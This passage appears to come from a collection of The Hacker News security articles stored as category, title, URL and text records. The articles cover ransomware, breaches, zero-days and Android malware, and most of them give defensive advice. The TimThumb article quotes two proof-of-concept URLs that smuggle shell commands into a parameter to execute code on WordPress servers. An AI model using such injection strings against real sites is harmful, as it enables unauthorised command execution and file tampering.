ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments. Weak credentials and VPN vulnerabilities have proven to be a blessing in disguise for threat actors to break into the internal networks of businesses and organizations, leading cybersecurity agencies in the U.S. and U.K. to publish multiple advisories about active exploitation of the flaws. ""The [Federal Office for Information Security] is becoming increasingly aware of incidents in which Citrix systems were compromised before the security updates that were made available in January 2020 were installed,"" the German cybersecurity agency said in an alert last week. ""This means that attackers still have access to the system and the networks behind it even after the security gap has been closed. This possibility is currently increasingly being used to carry out attacks on affected organizations."" The development also coincides with a fresh advisory from the U.K. National Cyber Security Centre (NCSC), which said it's observed an uptick in ransomware incidents targeting educational institutions at least since August 2020, while urging schools and universities to implement a ""defence in depth"" strategy to defend against such malware attacks. Some of the affected institutions included Newcastle and Northumbria Universities, among others. Citing Remote Desktop Protocol (RDP), vulnerable software or hardware, and email phishing as the three most common infection vectors, the agency recommended organizations to maintain up-to-date offline backups, adopt endpoint malware protection, secure RDP services using multi-factor authentication, and have an effective patch management strategy in place. A Spike in Ransomware Infections If anything, the ransomware crisis seems to be only getting worse. Historical data gathered by Temple University's CARE cybersecurity lab has shown that there have been a total of 687 publicly disclosed cases in the U.S. since 2013, with 2019 and 2020 alone accounting for more than half of all reported incidents (440). Government facilities, educational institutions, and healthcare organizations are the most frequently hit sectors, as per the analysis. And if 2020 is any indication, attacks against colleges and universities are showing no signs of slowing down. Allan Liska, a threat intelligence analyst at Recorded Future, revealed there had been at least 80 publicly reported ransomware infections targeting the education sector to date this year, a massive jump from 43 ransomware attacks for the whole of 2019. ""Part of this change can be attributed to extortion sites, which force more victims to announce attacks,"" Liska said in a tweet. ""But, in general, ransomware actors have more interest in going after colleges and universities, and they are often easy targets."" You can read more about NCSC's mitigation measures here. For more guidance on proofing businesses against ransomware attacks, head to US Cybersecurity Security and Infrastructure Security Agency's response guide here. ",Cyber_Attack Microsoft Release Security Intelligence Report !,https://thehackernews.com/2011/05/microsoft-release-security-intelligence.html,"Microsoft Release Security Intelligence Report ! The Security Intelligence Report (SIR) is an investigation of the current threat landscape. It analyzes exploits, vulnerabilities, and malware based on data from over 600 million systems worldwide, as well as internet services, and three Microsoft Security Centers. Volume 10 (SIR v10) is the most current edition covering 2010 and contains five sections: Key Findings provides data and analysis produced by Microsoft security teams. Reference Guide gives additional information for topics covered in the Key Findings. Featured Intelligence spotlights the latest threat topic. Global Threat Assessment provides deep dive telemetry by specific country or region. Managing Risk offers methods for protecting your organization, software, and people. Download Here ",Malware Secunia CSI 7.0 - Next generation Patch Management tool released,https://thehackernews.com/2013/09/Secunia-CSI-7-Patch-Management-tool_4.html,"Cybercrime costs organizations millions of dollars and to protect business from the consequences of security breaches, vulnerability intelligence and patch management are basic necessities in the toolbox of any IT team, as emphasized by organizations like the SANS Institute and the National Institute of Standards and Technology under the US Department of Commerce (NIST). The Secunia CSI 7.0 is the Total Package: Vulnerability Intelligence, Vulnerability Scanning with Patch Creation and Patch Deployment Integration. To help IT teams counter the threat, vulnerability research company Secunia merges the in-house vulnerability expertise with a sophisticated patch management solution into the Secunia Corporate Software Inspector (CSI 7.0). The foundation of the Secunia CSI is a unique combination of vulnerability intelligence and vulnerability scanning, with patch creation and patch deployment integration. The Secunia CSI integrates with Microsoft WSUS and System Center 2012 and third-party configuration management tools for easy deployment of third-party updates, making patching a simple and straight-forward process for all IT departments. To make the solution flexible and suited to the processes of organizations of all sizes the new version, the Secunia CSI 7.0, comes with these new and improved features: Smart Groups 2.0: Create Smart Groups designed to prioritize remediation efforts by filtering and segmenting data based on hosts, products or impact, and to receive alerts when a threat is detected; User Management: Create user accounts with different roles and permissions; Patch Configuration: get configurable patches out-of-the-box that can be easily customized to support your environment, for example to avoid desktop shortcuts or to disable auto-update for a program Web Console (SaaS): Log in to the Secunia CSI from an internet browser for instant access to your data and reports - anywhere, at any time. Password Policy Configuration: Determine and enforce the global password policy for your organization to comply with internal and external policies as well as to meet best-practice standards in your industry. Live updates: get an immediate overview of how a new vulnerability affects your infrastructure, as soon as the advisory has been released by Secunia Research, based on your latest scan results PSI for Android: Scan Android devices for vulnerabilities with the Secunia PSI for Android, and integrate it with the Secunia CSI to support your BYOD policy. Secunia SC2012 Plugin 2.0 for CSI integration with Microsoft System Center 2012. This add-on makes it possible to deploy all third-party updates directly in Microsoft System Center 2012. Zero-Day Vulnerability Support. The add-on includes SMS or email alerts, whenever a new zero-day vulnerability is discovered that affects the particular IT infrastructure. This add-on is designed for the select organizations that have a sufficiently sophisticated security apparatus to enable them to act on the zero-day threat intelligence. Why vulnerability intelligence is a crucial aspect of patch management In 2012, Secunia recorded a total of nearly 10,000 discovered vulnerabilities in software programs, and more than 1,000 vulnerabilities in the 50 most popular programs alone Most of these (86%) were discovered in third-party (non-Microsoft) programs, presenting IT teams with the huge challenge of how to retain control over increasingly complex infrastructures and user device autonomy and identify, acquire, install and verify patches for all applications in all systems. As vulnerabilities are the root cause of security issues, understanding how to deal with them is a critical component of protecting any organization from security breaches. IT teams must know when a vulnerability is threatening the infrastructure, where it will have the most critical impact, what the right remediation strategy is and how to deploy it. These aspects of risk assessment fall to IT Security and IT Operations respectively, and the two departments require different sets of tools to take strategic, pre-emptive action against vulnerabilities. ""The new Secunia CSI bridges the gap between the two sets of requirements. Security teams need vulnerability intelligence and scanning to assess risk in a constantly changing threat landscape, and IT operations need a patch management solution that is sufficiently agile to maintain security levels without an impairing daily performance,"" explains Morten R. Stengaard, Secunia CTO. ""The core of our solution is the vulnerability intelligence delivered by Secunia's renowned in-house Research Team, who test, verify, and validate public vulnerability reports, as well as conduct independent vulnerability research on a variety of products. No other patch management solution out there can provide this expertise. To deliver the intelligence to our customers, we have created a patch management solution which is constantly evolving, to meet the changing requirements of our users,"" says Morten R. Stengaard. Flexibility is the driving force behind the Secunia CSI 7.0 To ensure that the Secunia CSI 7.0 is primed to work as a conduit to Secunia's powerful vulnerability intelligence, scanning and patch management solution, flexibility has been the driving force behind the development of the Secunia CSI 7.0. ""Each organization is unique, with its own processes, regulatory standards and security procedures, and the improvements to the Secunia CSI 7.0 enables IT teams to adapt and scale the solution to match the requirements of virtually any organization,"" says Morten R. Stengaard. ",Vulnerability 10 year old girl hacker CyFi reveal her first zero-day in Game at #DefCon 19,https://thehackernews.com/2011/08/10-year-old-girl-hacker-cyfi-reveal-her.html,"10 year old girl hacker CyFi reveal her first zero-day in Game at #DefCon 19 Another awesome day at DefCon 19 . Today a 10 year old Girl hacker - pseudonym CyFi revealed her zero-day exploit in games on iOS and Android devices that independent researchers have confirmed as a new class of vulnerability. The 10-year-old girl from California first discovered the flaw around January 2011 because she ""started to get bored"" with the pace of farm-style games. About CyFi : She is cofounder of DEFCON Kids. CyFi is a ten-year-old hacker, artist and athlete living in California. She has spoken publicly numerous times, usually at art galleries as a member of ""The American Show,"" an underground art collective based in San Francisco. CyFi's first gallery showing was when she was four. Last year she performed at the SF MOMA Museum in San Francisco. DEFCON Kids will be her first public vulnerability disclosure. CyFi's has had her identity stolen twice. She really likes coffee, but her mom doesn't let her drink it. CyFi said, ""It was hard to make progress in the game, because it took so long for things to grow. So I thought, 'Why don't I just change the time?'"" Most of the games she discovered the exploit in have time-dependent factors. Manually advancing the phone or tablet's clock forced the game further ahead than it really was, opening up the exploit. CyFi said that she discovered some ways around those detections. Disconnecting the phone from Wi-Fi made it harder to stop, as did making incremental clock adjustments. CyFi's mother, who must remain anonymous to protect her daughter's identity, told at the end of CyFi's presentation at DefCon Kids that they would offer a $100 reward to the young hacker who found the most games with this exploit over the following 24 hours. The reward is sponsored by AllClearID, a identity protection company that is also sponsoring the DefCon Kids. CyFi revealed that she was only a little bit nervous about having to speak in front of the 100 or so expected attendees. She admitted that while it was probably different publicly speaking about a topic with such a specific focus, it would be hard for her to imagine what those differences might be. ""Well, I haven't done it yet,"" she said. ",Vulnerability Zero-Day TimThumb WebShot Vulnerability leaves Thousands of Wordpress Blogs at Risk,https://thehackernews.com/2014/06/zero-day-timthumb-webshot-vulnerability.html,"Yesterday we learned of a critical Zero-day vulnerability in a popular image resizing library called TimThumb, which is used in thousands WordPress themes and plugins. WordPress is a free and open source blogging tool and a content management system (CMS) with more than 30,000 plugins, each of which offers custom functions and features enabling users to tailor their sites to their specific needs, therefore it is easy to setup and use, that's why tens of millions of websites across the world opt it. But if you or your company are the one using the popular image resizing library called ""TimThumb"" to resize large images into usable thumbnails that you can display on your site, then you make sure to update the file with the upcoming latest version and remember to check the TimThumb site regularly for the patched update. 0-Day REMOTE CODE EXECUTION & NO PATCH The critical vulnerability discovered by Pichaya Morimoto in the TimThumb Wordpress plugin version 2.8.13, resides in its ""Webshot"" feature that, when enabled, allows attackers to execute commands on a remote website. The vulnerability allows an attacker to remotely execute arbitrary PHP code on the affected website. Once the PHP code has been executed, the website can be easily compromised in the way the attacker wants. Until now, there is no patch available for the flaw. ""With a simple command, an attacker can create, remove and modify any files on your server,"" says Security experts at Sucuri break in a blog post. Using the following command, a hacker can create, delete and modify any files on your server: https://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=https://vulnerablesite.com/$(rm$IFS/tmp/a.txt) https://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php??webshot=1&src=https://vulnerablesite.com/$(touch$IFS/tmp/a.txt) WHO ARE VULNERABLE Unfortunately, there are hundreds of other Wordpress plugins and themes, those are using TimThumb library by default. Some of theme are: 1.) TimThumb 2.8.13 Wordpress plugin 1.) WordThumb 1.07 is also using same vulnerable WebShot code. 2.) Wordpress Gallery Plugin 3.) IGIT Posts Slider Widget 4.) All Wordpress themes from Themify contains vulnerable wordthumb at ""/themify/img.php"" location. The good news is that Timthumb comes with the webshot option disabled by default, so only those Timthumb installations are vulnerable to the flaw who have manually enabled the webshot feature. CHECK AND DISABLE TIMTHUMB ""WEBSHOT"" Open timthumb file inside your theme or plugin directory, usually located at ""/wp-content/themes//path/to/timthumb.php"" Search for ""WEBSHOT_ENABLED"" If the you find define ('WEBSHOT_ENABLED', true) , then set the value to ""false"", i.e. define ('WEBSHOT_ENABLED', false) Unfortunately, similar multiple security flaws were discovered in TimThumb in the past, leaving millions of WordPress powered websites vulnerable to attack. ",Vulnerability WebRTC Vulnerability leaks Real IP Addresses of VPN Users,https://thehackernews.com/2015/02/webrtc-leaks-vpn-ip-address.html,"An extremely critical vulnerability has recently been discovered in WebRTC (Web Real-Time Communication), an open-source standard that enables the browsers to make voice or video calls without needing any plug-ins. AFFECTED PRODUCTS Late last month, security researchers revealed a massive security flaw that enables website owner to easily see the real IP addresses of users through WebRTC, even if they are using a VPN or even PureVPN to mask their real IP addresses. The security glitch affects WebRTC-supporting browsers such as Google Chrome and Mozilla Firefox, and appears to be limited to Windows operating system only, although users of Linux and Mac OS X are not affected by this vulnerability. HOW DOES THE WebRTC FLAW WORKS WebRTC allows requests to be made to STUN (Session Traversal Utilities for NAT) servers which return the ""hidden"" home IP-address as well as local network addresses for the system that is being used by the user. The results of the requests can be accessed using JavaScript, but because they are made outside the normal XML/HTTP request procedure, they are not visible in the developer console. This means that the only requirement for this to work is WebRTC support in the browser and JavaScript. CHECK YOURSELF NOW A demonstration published by developer Daniel Roesler on GitHub allows people to check if they are affected by the security glitch. Also, you can go through the following steps in order to check if you're affected: Connect to ExpressVPN Visit https://ipleak.net If your browser is secure, you should see something like this: If your browser is affected by this issue, you'll see information about your true IP address in the WebRTC section. HOW TO PROTECT YOURSELF Luckily the critical security flaw is quite easy to fix. For Chrome users : Google Chrome and other Chromium-based browser users can install the WebRTC Block extension or ScriptSafe, which both reportedly block the vulnerability. For Firefox Users : In case of Firefox, the only extensions that block these look ups are JavaScript blocking extensions such as NoScript. To fix, try the following steps: Type about:config in the browser's address bar and hit enter. Confirm you will be careful if the prompt appears. Search for media.peerconnection.enabled. Double-click the preference to set it to false. This turns of WebRTC in Firefox. ",Vulnerability Boys Town Healthcare Data Breach Exposed Personal Details of Patients,https://thehackernews.com/2018/07/data-breach-healthcare.html,"Another day, Another data breach! This time-sensitive and personal data of hundreds of thousands of people at Boys Town National Research Hospital have been exposed in what appears to be the largest ever reported breach by a pediatric care provider or children's hospital. According to the U.S. Department of Health and Human Services Office for Civil Rights, the breach incident affected 105,309 individuals, including patients and employees, at the Omaha-based medical organization. In a ""Notice of Data Security Incident"" published on its website, the Boys Town National Research Hospital admitted that the organization became aware of an abnormal behavior regarding one of its employees' email account on May 23, 2018. After launching a forensic investigation, the hospital found that an unknown hacker managed to infiltrate into the employee's email account and stole personal information stored within the email account as a result of unauthorized access. The hacker accessed the personal and medical data of more than 100,000 patients and employees, including: Name Date of birth Social Security number Diagnosis or treatment information Medicare or Medicaid identification number Medical record number Billing/claims information Health insurance information Disability code Birth or marriage certificate information Employer Identification Number Driver's license number Passport information Banking or financial account number Username and password With this extensive information in hand, it's most likely that hackers are already selling personal information of victims on the dark web or attempting to carry out further harm to them, particularly child patients at the hospital. However, The Boys Town National Research Hospital says it has not received any reports of the misuse of the stolen information so far. ""Boys Town takes this incident and the security of personal information seriously. Upon learning of this incident, Boys Town moved quickly to confirm whether personal information may have been affected by this incident, to identify the individuals related to this personal information, to put in place resources to assist them, and to provide them with notice of this incident,"" the hospital says. The hospital has also reported the incident to law enforcement and is notifying state and federal regulators, along with potentially affected individuals. Boys Town has also promised to offer affected individuals access to 12 months of free identity protection services. Boys Town hospital is also reviewing its existing policies and procedures and is implementing some additional security measures to safeguard its users' information stored in its systems. However, victims are highly recommended to monitor their accounts for any fraudulent transaction and should consider placing a credit freeze request. Here's how you can freeze credit report to protect yourself against identity theft. For additional information related to the incident, you can call 1-855-686-9425 (toll-free), Monday through Saturday from 8:00 a.m. to 8:00 p.m. CT. ",Cyber_Attack Gauss Malware Detection Tool released by Iranian CERT,https://thehackernews.com/2012/09/gauss-malware-detection-tool-released.html,"Iranian National Computer Emergency Response Team releases a tool for Gauss malware detection. Cyber surveillance virus has been found in the Middle East that can spy on banking transactions and steal login and passwords, according Kaspersky Lab, a leading computer security firm. Gauss primarily infects 32-bit versions of Windows, though a separate spy module for USB drives can collect information from 64-bit systems. Infections are mainly split between Windows 7 and Windows XP, although some of the Gauss modules don't work against Windows 7 Service Pack 1. Mac and Linux machines appear to be safe. Multiple modules of Gauss serve the purpose of collecting information from browsers, which include the history of visited websites and passwords. Detailed data on the infected machine is also sent to the attackers, including specifics of network interfaces, the computer's drives and BIOS information. The Gauss module is also capable of stealing data from the clients of several Lebanese banks including the Bank of Beirut, EBLF, BlomBank, ByblosBank, FransaBank and Credit Libanais. It also targets users of Citibank and PayPal. Download Gauss Malware Detection Tool from Iran CERT. Another Similar Tools are : Kaspersky virus removal tool, or use a Web page provided by Hungarian research lab CrySyS to scan for the virus. The CrySyS page will check your system for Palida Narrow, a font associated with Gauss. ",Malware New Internet Explorer Zero-Day Vulnerability Publicly Disclosed; Identified in October 2013,https://thehackernews.com/2014/05/internet-explorer-zero-day.html,"Oh Microsoft, How could you do this to your own Internet Explorer? Microsoft had kept hidden a critical Zero-Day vulnerability of Internet explorer 8 from all of us, since October 2013. A Critical zero-day Internet Explorer vulnerability (CVE-2014-1770), which was discovered by Peter 'corelanc0d3r' Van Eeckhoutte in October 2013 just goes public today by the Zero Day Initiative (ZDI) website. Zero Day Initiative is a program for rewarding security researchers for responsibly disclosing vulnerabilities. ZDI reportedly disclosed the vulnerability to Microsoft when it was first identified by one of its researchers, on which Microsoft responded 4 month later on February 2014 and confirmed the flaw, but neither the Microsoft patch the vulnerability nor it disclosed any details about it. But due to ZDI's 180 days public notification policy, they are obligated to publicly disclosed the details of a Zero-Day vulnerability. ZDI warned Microsoft several days ago about the pending public disclosure of the flaw after it completed 180 days as on April, but apparently Microsoft didn't respond to it. According to the ZDI Security Advisory, the vulnerability is a zero day remote code execution flaw that affects the Internet Explorer version 8 and allows a remote attacker to execute arbitrary code through a bug in CMarkup objects. In a web-based attack scenario, an attacker could leverage the Vulnerability through compromise websites and by clicking on email attachments. To perform successful web-based attacks, an attacker can host specially crafted content on the compromised websites that could trigger the reported vulnerability. ""In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email message or in an Instant Messenger message that takes users to the attacker's website, or by getting them to open an attachment sent through email,"" reads the ZDI post. By successful exploitation of the flaw, an attacker could gain the same user rights as the current user on the compromised system and victim 'users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.' If you are using Microsoft Outlook, Microsoft Outlook Express, or Windows Mail to open HTML emails, then it automatically disables the Script and ActiveX controls, that helps reduce the risk of an attacker being able to use these vulnerabilities to execute malicious code. But once the user clicks any malicious link attached with the email messages, he or she would fall victim for the exploitation of these vulnerabilities through the web-based attacks. Moreover, Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2 users should not worry if they have Enhanced Security Configuration enabled on their Internet Explorer, because this mode mitigates these vulnerabilities. The vulnerability has not been addressed by Microsoft and no patch is available yet for this critical zero day vulnerability, so Internet Explorer user are still vulnerable to the zero-day attack. You are advised to block ActiveX Controls and Active Scripting and also install EMET (Enhanced Mitigation Experience Toolkit), that enable you to manage security mitigation technologies that help make it more difficult for attackers to exploit vulnerabilities in a given piece of software. Just few days back, a similar remote code execution vulnerability in the Internet Explorer that affected almost all the versions of IE was reported by the security firm FireEye. ",Vulnerability These Top 7 Brutal Cyber Attacks Prove 'No One is Immune to Hacking' — Part II,https://thehackernews.com/2015/09/top-cyber-attacks-2.html,"In Part I of this two-part series from The Hacker News, the First Four list of Top Brutal Cyber Attacks shows that whoever you are, Security can never be perfect. As attackers employ innovative hacking techniques and zero-day exploits, the demand for increased threat protection grows. In this article, I have listed another three cyber attacks, as following: #5 Car Hacking Driving a car is a network's game now! 'Everything is hackable,' but is your car also vulnerable to Hackers? General Motors' OnStar application and cars like Jeep Cherokee, Cadillac Escalade, Toyota Prius, Dodge Viper, Audi A8 and many more come equipped with more advanced technology features. These cars are now part of the technology very well known as the ""Internet of Things"". Recently two Security researchers, Chris Valasek and Charlie Miller demonstrated that Jeep Cherokee could be hacked wirelessly over the internet to hijack its steering, brakes, and transmission. The OnStar application is an inbuilt unit attached to the interior, rearview mirror of the car with features such as remotely unlocking cars and starting the engines. Similarly, Jeep manufactured Jeep Cherokee's latest model is the fourth generation car fully equipped with the latest technology advancements. In the recent incidents, Jeep Cherokee, as well as OnStar's application, were hacked leaving the cars as the slaves of the hackers and prone to accidents. A security flaw in the car's entertainment system was compromised by two white hat hackers: Charlie Miller and Chris Valasek. The flaw allowed the hackers to inject malware into the system for remote control from miles away. The hackers were able to turn up the music volume to the maximum and start the windshield wipers remotely while they were '10 miles away'. An outrageous act they did was cutting off the transmission and disconnected the brakes that led the car crash into a ditch. Reports say that both Jeep Cherokee and Escalade have an inherent security flaw. This is such: The cars' apps, Bluetooth and telematics connecting the car to a cellular network like OnStar are on the same network as the engine controls, brakes, steerings and tire pressure monitor system. Miller and Valasek said a car's networked system could be an easy gateway for the hackers to come in with just the use of their mobile phones and a laptop. What they need to do is just know the car's IP address, and they can break into its system through a wireless internet connection. #6 Data Breach at US Government Office of Personnel Management United States Office of Personnel Management (US OPM) is an independent agency of the United States that works to recruit, retain and honor a world-class workforce for the American people. The US OPM became a victim of a cyber attack twice that led to a data breach, compromising personal information of some 21.5 million related to current and former federal workers. Hackers accessed sensitive data of US government officials that could be used for identity theft and cyber-espionage. The stolen data included Social Security Numbers, employment history, residency and educational history, criminal and financial history, fingerprints, information about health, personal and business acquaintances. Some stolen records also include findings from interviews conducted by background investigators that discussed sexual assaults and drug, mental health treatments and alcohol addictions. Investigations reveal that China-based hackers were behind the data breaches at the Office of Personnel Management (OPM). #7 Anthem Data Breach Anthem Insurance Inc., previously known as WellPoint Inc, was a victim of a massive cyber attack in February. Back in February, Cyber attackers executed a very sophisticated attack to gain unauthorized access to the company's IT systems that had database of some 80 million people and obtained personal identifiable information (PII) relating to its consumers and employees. The information accessed included: Names, Birthdays, Social security numbers, Email addresses Employment information, including income data The hackers gained access to Anthem's data by stealing the network credentials of at least five of its employees with high-level IT access. The path may have been ""Phishing"", in which a fraudulent e-mail could have been used to trick employees into revealing their network ID and password, or into unknowingly downloading software code that gives the hackers long-term access to Anthem's IT environment. The company informed millions of its affected customers of the massive data breach that potentially exposed the personal information of its former as well as current customers. Anthem appointed Mandiant, world's leading cyber security organization, to evaluate the scenario and provide necessary solutions. This is just the beginning... These are just seven; there are many more! And it could reach you too. The power of the cyberspace and the criminals hovering over it should not be underrated. Chucking such happenings where your personal data is at risk and being irrational is not the solution rather it is the beginning of activities that will bother you big time in the future. The cyberspace is like a dope that is capable of psychoactive effects. A proactive thinking and approach will take you ahead of the people on the other end. Take the time to ponder over the incidents and respond wisely is all we have to say! ",Cyber_Attack Another Google Chrome 0-Day Bug Found Actively Exploited In-the-Wild,https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html,"Google has addressed yet another actively exploited zero-day in Chrome browser, marking the second such fix released by the company within a month. The browser maker on Friday shipped 89.0.4389.90 for Windows, Mac, and Linux, which is expected to be rolling out over the coming days/weeks to all users. While the update contains a total of five security fixes, the most important flaw rectified by Google concerns a use after free vulnerability in its Blink rendering engine. The bug is tracked as CVE-2021-21193. Details about the flaw are scarce except that it was reported to Google by an anonymous researcher on March 9. According to IBM, the vulnerability is rated 8.8 out of 10 on the CVSS scale, and could allow a remote attacker to execute arbitrary code on the target system. ""By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system,"" the report stated. As is usually the case with actively exploited flaws, Google issued a terse statement acknowledging that an exploit for CVE-2021-21193 existed but refrained from sharing additional information until a majority of users are updated with the fixes and prevent other threat actors from creating exploits targeting this zero-day. ""Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild,"" Chrome Technical Program Manager Prudhvikumar Bommana noted in a blog post. With this update, Google has fixed three zero-day flaws in Chrome since the start of the year. Earlier this month, the company issued a fix for an ""object lifecycle issue in audio"" (CVE-2021-21166) which it said was being actively exploited. Then on February 4, the company resolved another actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine. Chrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw. ",Vulnerability Java based cross platform malware found in wild,https://thehackernews.com/2013/08/Cross-platform-malware-java-hacking-tool.html,"Other than Windows, Now other platforms are becoming more popular every day and attracting bad guys who are starting to create malicious code for other systems. Java applications can run on multiple platforms with ease, thus no surprise that malicious code written in Java that is designed to target more than one operating system are becoming increasingly common. Researchers at McAfee Labs spotted another sample of Java based trojan dubbed as JV/BackDoor-FAZY that opens a back door for an attacker to execute commands and acts as a bot after infection. According to researcher, The key to decrypt the config file was encrypted with Base 64, Triple-DES algorithm and Hex. Decrypting the file provides information about the backdoor connection, includes IP address, port number, operating system, mutex information, and password for the connection. ""On execution, the JAR file opens the backdoor connection to the IP address and the port mentioned in the plain config file. Once the backdoor connection is made, the compromised user environment will act as the server and the attacker will be the client. The attacker can now take control of the victim's system and can execute any commands."" blog post said. Such malicious file can be bundled with a legitimate file and can be dropped and executed in the background, without the user consent and can copy itself to all available drives on the system and allows hackers to record the user screen, keystrokes, access to command prompt, downloading & execute other binary files or using the system to DDoS using HTTP POST and GET requests. Multi-platform malware is not entirely new, but with the increasing popularity of Apple products and systems running Linux, there is an incentive for malware authors to save time and resources by developing strains that are capable of infecting multiple operating systems. ",Malware New Cold Boot Attack Unlocks Disk Encryption On Nearly All Modern PCs,https://thehackernews.com/2018/09/cold-boot-attack-encryption.html,"Security researchers have revealed a new attack to steal passwords, encryption keys and other sensitive information stored on most modern computers, even those with full disk encryption. The attack is a new variation of a traditional Cold Boot Attack, which is around since 2008 and lets attackers steal information that briefly remains in the memory (RAM) after the computer is shut down. However, to make the cold boot attacks less effective, most modern computers come bundled with a safeguard, created by the Trusted Computing Group (TCG), that overwrites the contents of the RAM when the power on the device is restored, preventing the data from being read. Now, researchers from Finnish cyber-security firm F-Secure figured out a new way to disable this overwrite security measure by physically manipulating the computer's firmware, potentially allowing attackers to recover sensitive data stored on the computer after a cold reboot in a matter of few minutes. ""Cold boot attacks are a known method of obtaining encryption keys from devices. But the reality is that attackers can get their hands on all kinds of information using these attacks. Passwords, credentials to corporate networks, and any data stored on the machine are at risk,"" the security firm warns in a blog post published today. Video Demonstration of the New Cold Boot Attack Using a simple tool, researchers were able to rewrite the non-volatile memory chip that contains the memory overwrite settings, disable it, and enable booting from external devices. You can also watch the video demonstration performing the attack below. Like the traditional cold boot attack, the new attack also requires physical access to the target device as well as right tools to recover remaining data in the computer's memory. ""It's not exactly easy to do, but it is not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out,"" says F-Secure principal security consultant Olle Segerdahl, one the two researchers. ""It's not exactly the kind of thing that attackers looking for easy targets will use. But it is the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use."" How Microsoft Windows and Apple Users Can Prevent Cold Boot Attacks According to Olle and his colleague Pasi Saarinen, their new attack technique is believed to be effective against nearly all modern computers and even Apple Macs and can't be patched easily and quickly. The two researchers, who will present their findings today at a security conference, say they have already shared their findings with Microsoft, Intel, and Apple, and helped them explore possible mitigation strategies. Microsoft updated its guidance on Bitlocker countermeasures in response to the F-Secure's findings, while Apple said that its Mac devices equipped with an Apple T2 Chip contain security measures designed to protect its users against this attack. But for Mac computers without the latest T2 chip, Apple recommended users to set a firmware password in order to help harden the security of their computers. Intel has yet to comment on the matter. The duo says there's no reliable way to ""prevent or block the cold boot attack once an attacker with the right know-how gets their hands on a laptop,"" but suggest the companies can configure their devices so that attackers using cold boot attacks won't find anything fruitful to steal. Meanwhile, the duo recommends IT departments to configure all company computers to either shut down or hibernate (not enter sleep mode) and require users to enter their BitLocker PIN whenever they power up or restore their PCs. Attackers could still perform a successful cold boot attack against computers configured like this, but since the encryption keys are not stored in the memory when a machine hibernates or shuts down, there will be no valuable information for an attacker to steal. ",Vulnerability iBanking Android Malware targeting Facebook Users with Web Injection techniques,https://thehackernews.com/2014/04/ibanking-android-malware-targeting.html,"iBanking is nothing but a mobile banking Trojan app which impersonates itself as a so-called 'Security App' for Android devices and distributed through HTML injection attacks on banking sites, in order to deceive its victims. Recently, its source code has been leaked online through an underground forum that gave the opportunities to a larger number of cyber criminals to launch attacks using this kind of ready-made mobile malware. The malicious iBanking app installed on victims' phone has capabilities to spy on user's communications. The bot allows an attacker to spoof SMS, redirect calls to any pre-defined phone number, capture audio using the device's microphone and steal other confidential data like call history log and the phone book contacts. According to new report from ESET security researchers, now this iBanking Trojan (Android/Spy.Agent.AF) is targeting Facebook users by tricking them to download a malware application. The malware uses JavaScript web injection method to create a fake Facebook Verification page for Facebook users, as shown: Injected fake verification page prompts users to enter their mobile number in order to verify the Facebook account authenticity, and then shows the following page if he indicates that his mobile is running Android. Next fake page asks victim to download an Android app from the shown URL or using QR code method, if SMS somehow fails to reach the user's phone. Once downloaded and installed, the malware connects to its command-and-control server that allows attackers to issue commands to each infected device. Facebook also has two-factor authentication features for quite a long time, but this is the very first time when Facebook users are targeted by iBanking Trojan. The reason may be an increasing number of people using it. Since many banking sites use two-factor authentication and transaction authorization systems in order to deal with the various threats, but in order to bypass two factor authentication, cyber criminals have started to create various mobile malware like iBanking to solve their purpose. iBanking Trojan can be used in conjunction with any malware in order to inject code into a webpage and is generally used to redirect incoming SMS messages to bypass two-factor authentication. It is always important to treat third-party apps with a healthy dose of suspicion and skepticism as cybercriminals are always out there to hijack your every device. Don't just download any app from any source you happen to encounter and before installing a new app, just check out the reputation of both the app and the publisher. In order to prevent direct installations, go to your Android device's Applications Settings menu and disable the ""unknown sources"" option for installing apps. Stay Safe! ",Malware WARNING — Malware Found in CamScanner Android App With 100+ Million Users,https://thehackernews.com/2019/08/android-camscanner-malware.html,"Beware! Attackers can remotely hijack your Android device and steal data stored on it, if you are using free version of CamScanner, a highly-popular Phone PDF creator app with more than 100 million downloads on Google Play Store. So, to be safe, just uninstall the CamScanner app from your Android device now, as Google has already removed the app from its official Play Store. Unfortunately, CamScanner has recently gone rogue as researchers found a hidden Trojan Dropper module within the app that could allow remote attackers to secretly download and install malicious program on users' Android devices without their knowledge. However, the malicious module doesn't actually reside in the code of CamScanner Android app itself; instead, it is part of a 3rd-party advertising library that recently was introduced in the PDF creator app. Discovered by Kaspersky security researchers, the issue came to light after many CamScanner users spotted suspicious behavior and posted negative reviews on Google Play Store over the past few months, indicating the presence of an unwanted feature. ""It can be assumed that the reason why this malware was added was the app developers' partnership with an unscrupulous advertiser,"" the researchers said. The analysis of the malicious Trojan Dropper module revealed that the same component was also previously observed in some apps pre-installed on Chinese smartphones. ""The module extracts and runs another malicious module from an encrypted file included in the app's resources,"" researchers warned. ""As a result, the owners of the module can use an infected device to their benefit in any way they see fit, from showing the victim intrusive advertising to stealing money from their mobile account by charging paid subscriptions."" Kaspersky researchers reported its findings to Google, who promptly removed the CamScanner app from its Play Store, but they say ""it looks like app developers got rid of the malicious code with the latest update of CamScanner."" Despite this, the researchers advised users to just keep in mind ""that versions of the app vary for different devices, and some of them may still contain malicious code."" It should be noted that since the paid version of the CamScanner app doesn't include the 3rd-party advertising library and thus the malicious module, it is not affected and is still available on the Google Play Store. Although Google has stepped up its efforts to remove potentially harmful apps from Play Store in the last few years and added more stringent malware checks for new apps, legitimate apps can go rogue overnight to target millions of its users. ""What we can learn from this story is that any app — even one from an official store, even one with a good reputation, and even one with millions of positive reviews and a big, loyal user base —can turn into malware overnight,"" the researchers concluded. Therefore, you are strongly advised to always keep a good antivirus app on your Android device that can detect and block such malicious activities before they can infect your device. In addition, always look at the app reviews left by other users who have downloaded the app, and also verify app permissions before installing any 